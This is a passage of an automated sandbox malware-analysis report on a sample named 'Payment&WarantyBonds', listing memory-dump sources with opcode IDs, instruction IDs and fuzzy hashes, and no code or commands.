                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                                                                                • Instruction ID: 2cea2628532c7f97caf0196ab72f5b903d5d698aa595f7c4395edc20b281806a
                                                                                                                                                                                • Opcode Fuzzy Hash: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                                                                                • Instruction Fuzzy Hash: CC31C432A0051C9BDB319F18CC41FEEB7B9AB15750F0200A9F745E72A0DA749E808F91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                                                                                • Instruction ID: ee95d43864a04ae2fca9a334293d137e8179335f759d029179137124161296b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                                                                                • Instruction Fuzzy Hash: E211E631B006199BDB92CF4DC8C0916BBE5EF4B710B18407DEE08CF249D6B1DB418B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                                • Instruction ID: ba1386106d5226e91436d413469cd559257553ced71626bb1545b2352f50329f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                                • Instruction Fuzzy Hash: FC217972600A45DFD7299F49C540A66BBE6FBD4B10F18887DE98AC7610C731EE01CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                                                                                • Instruction ID: 0a37727c089e662662cf1c83d9465aa2251ea21ba042bbcf6cd0e3381f73d338
                                                                                                                                                                                • Opcode Fuzzy Hash: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                                                                                • Instruction Fuzzy Hash: 62218E35A0060ADFCB15CF58C981A6EBBB5FF89318F20416DD105A7350C771AE46CBD0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                                                                                • Instruction ID: bd64b72069c152c1315d42f0678c78dc0af56d4844e2d08d9582652c72bd22fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B218E75510A00EFD7218F6CC841F66B7F8FF84354F54892DE59AC7250EA30AA50CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                                                                                • Instruction ID: 93c3f2b1ab15aab6d8fd6056b5da7bbf8d22d67f0badab50c751b192e6e7844b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F112F333001245FCB1ADB29DC91A6B729BEFD5374B35462DDA22CB254ED30DA41C795
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                                                                                • Instruction ID: 53d8791f8447c59ce682004efe16f9758655f0b87e3037423cfac50282842dba
                                                                                                                                                                                • Opcode Fuzzy Hash: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                                                                                • Instruction Fuzzy Hash: 6411C672240518EFCB22DB5DCD40F9ABBA8EF95B64F254025F606DF251EA70EA01CBD0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                                                                                • Instruction ID: c9a4b3a78bfffcc01a6ff328c62851a313c6d19564e507d5d057a92e2e91d368
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                                                                                • Instruction Fuzzy Hash: D211BF76A01206ABCB26CF5DC580E5ABBE9ABC4750B698279D905DB315F630DF00CBE0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                • Instruction ID: cf66756848549f90df2ab55d6b380fdcf1f7714c7cd31304be40ee36283c8167
                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 78110436A00909AFDB19CB58C841B9DBBB5EF84710F058269EC55E7340E631FE01CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                • Instruction ID: c6578a06a1996affb0e314402bc1e348788c749d0ef088cf1828ba39dbc975eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                • Instruction Fuzzy Hash: 192106B5A00B099FD3A0CF29D440B52BBF4FB48B10F10492EE98AC7B50E771E914CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                • Instruction ID: b06401ec885b4729b7a65da48490105e70006192a9b36201f27a9e21187ed276
                                                                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0311C232A20609EFE721AF4DCC44B5EBBE5EF45754F058428EA19DB160DB71EE40DB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                                                                                • Instruction ID: 512930c3f0e0b04d9180e792a45e076a8987d24cba22fb5a4e572f9c5eb9c7bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 71633378730a8143fa800f85cc137b178f1c4070c4924e23c8dba9615e08d9d2
                                                                                                                                                                                • Instruction Fuzzy Hash: E1014932305689AFE32BA66DDC84F277B8DEF90395F050075F900EB251DA58DE00C2B2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                                                                                • Instruction ID: 0f401c91a13d445b6e7df06c48e51adb50f83569ab0df6db82333348136e7257
                                                                                                                                                                                • Opcode Fuzzy Hash: 5a141bb9ffaff96f2729c142624be58d5020222a710040e4518909d8144653c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 57119E7628064DAFDB668F5DDD40B567BA8EB86B64F004219FA05CB691C370EA00CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e526ddbbc9e7fd2fe8792e9ec023c47ad5d059a1d1a056ea85e97e3702efd955
                                                                                                                                                                                • Instruction ID: 2220e993faa9083994c88848a5825de25b555b7bd0299d8bdaf5bc87d5ffea52
                                                                                                                                                                                • Opcode Fuzzy Hash: e526ddbbc9e7fd2fe8792e9ec023c47ad5d059a1d1a056ea85e97e3702efd955
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D1129322007119FD722DBADD840F27B7A6FFD4320F144429EA86C7A50DA30EA02CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                                                                                • Instruction ID: c07507ad2f922baccfad7795b872c1f2a581b1fc23e59b978600c887353e60f7
                                                                                                                                                                                • Opcode Fuzzy Hash: 51eb7f855f2ce3614150a4357687a2a45c308552a6f6405cc51d592fcef90339
                                                                                                                                                                                • Instruction Fuzzy Hash: C4117072A00615ABDB229B5DC980B5EFBB8EF84790F690459DA01E7244F730AB059BA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                                                                                • Instruction ID: a88c0b1f67f1d17f9b4a9d779977dc73264b5b36f984fb00542a82a883158d96
                                                                                                                                                                                • Opcode Fuzzy Hash: df2c1d07ee078f30b89a6a2bc46d195f7bcf6327d181a8a1ad50c6f8195122e3
                                                                                                                                                                                • Instruction Fuzzy Hash: 53019E715011099FC726DB19E448F16BBF9EB95314F21816EE206CB6A4CB70AE86CF94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction ID: d1fe456e000569de773af55c365dca3442b0f98ed8fe05f6c7ca29bdf0d51f47
                                                                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                                                                • Instruction Fuzzy Hash: 0411E5722126D69BE723972CEA64B257B9CAF0075CF1900A0EF45D7642F728CA82C255
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                • Instruction ID: 9a8a345abe7e3bee9b842ac2cb83206f59ea5922a23cdf968eac5438b91a17dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                                                                • Instruction Fuzzy Hash: 33019236600109AFE721BF5CCC40F5A7AA9EB95B54F058424EA05DB261E771DF40C790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction ID: f38a5a73cbab96c1f9040f419f1b800108ddbbd967dc762aec89b3412697e4a0
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                                                                • Instruction Fuzzy Hash: F7012636608B219BCB318F19E840A33BBA8EF95B70700852DFE99CB381C731D400CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fc66967bb1c2f7b7148ccb14f24e8c7199678302435ea301296b793032e4f1fc
                                                                                                                                                                                • Instruction ID: 103eb22be4aa6ceb108b2bd6147d1c1c615860d15f4d4a738aaaccae8b258f4a
                                                                                                                                                                                • Opcode Fuzzy Hash: fc66967bb1c2f7b7148ccb14f24e8c7199678302435ea301296b793032e4f1fc
                                                                                                                                                                                • Instruction Fuzzy Hash: C2012233541301AFC332DF1EC840E12B7A8EB81370B254225E9A8DB5BAE730EA01CBC0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                                                                                • Instruction ID: f51703e78b66852d99852aaad0596137d446e9ab64d1730daa28d69133a91f19
                                                                                                                                                                                • Opcode Fuzzy Hash: 50cdf3ca0990f19002b564dc782a91968c55a9af944d1bcc9a6c3b1e8570c393
                                                                                                                                                                                • Instruction Fuzzy Hash: 9911A132241245EFDB26EF19CD80F167BB8FF54B54F2000A9FA05DB691D635EE01CA90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                                                                                • Instruction ID: 28cd02acb2dfb6e1fdf5a8651c948414dd11269a99fc88f09e8160ff38cbdf3d
                                                                                                                                                                                • Opcode Fuzzy Hash: 19623b15249887d8d07f27dda0a7f072c5f3d8fb5987ae2c81036832e6f84c39
                                                                                                                                                                                • Instruction Fuzzy Hash: CE115E7154522DABEB65EB68CC41FE9B375AF04710F504194B314E60E1DB709F91CF85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction ID: edf7cb7681aa361362e19c3de68b4cd9a20729ba72984c7e3b49936273947525
                                                                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F0128322002148BEF52CA1DDC84B52776BFFC4714F5545A5ED45CF286DAB1CE81C390
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                                                                                • Instruction ID: eab0227004a211ba0b4aa8fa08b16bc968c78274be75df7870dcd1188936d31e
                                                                                                                                                                                • Opcode Fuzzy Hash: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                                                                                • Instruction Fuzzy Hash: 4011177790011DABCB12EB98CC80DDFBB7CEF48358F044166A906E7211EA34AB15CBE1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                                                                                • Instruction ID: 174b8504d3d83ed8c66038be4bfc5cc994fa7ab67b18e7fc8d575cd77c87adb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                                                                                • Instruction Fuzzy Hash: 2811A1766441469FDB11CF58D800BA6BBB9FB9A314F1D8159F848CB315E732ED81CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                                                                                • Instruction ID: 1199cff6d8107ec94190484e24b15b2429232379fa2b104641b4f61082c6e782
                                                                                                                                                                                • Opcode Fuzzy Hash: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 5A1118B1A0020D9FCB00DFA9D541AAEBBF8FF58350F10406AA905E7355D674EA018BA4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction ID: bdd6cf08b8f8465f83ab0363c46927b8bd514e4c69ebc21ed80cc3589dde3aea
                                                                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D01B5321007099FEB2396ADC800EA7B7E9FFC5314F04495DAE46CB650DA74E642C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                                                                                • Instruction ID: ec3bf9d7bc1bab835b991f434b90b74cd3e99cbd0a0938df014337ca66b9ddef
                                                                                                                                                                                • Opcode Fuzzy Hash: 0880908625daf242fc33eaa8827c34e85fa6a063b1f033d5c5c87422fb8fcabd
                                                                                                                                                                                • Instruction Fuzzy Hash: DB116D35A0120DEBDB05EFA8D850FAE7BB6EB44344F104059F906D7250DA35EF11CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                                                                                • Instruction ID: 45e64075375a6dfb3558126facdf6e7a5b66be0dae5fc66242a1e5310033b402
                                                                                                                                                                                • Opcode Fuzzy Hash: e75990d78a4cb036cdd1dd1d680815a9630ea64b1bf50b668c268221c3ae3bd1
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E01DF72610A02BBC311BB2DCD80E53BBADFB947A4B000629F605C3650EB24EE01C6E1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
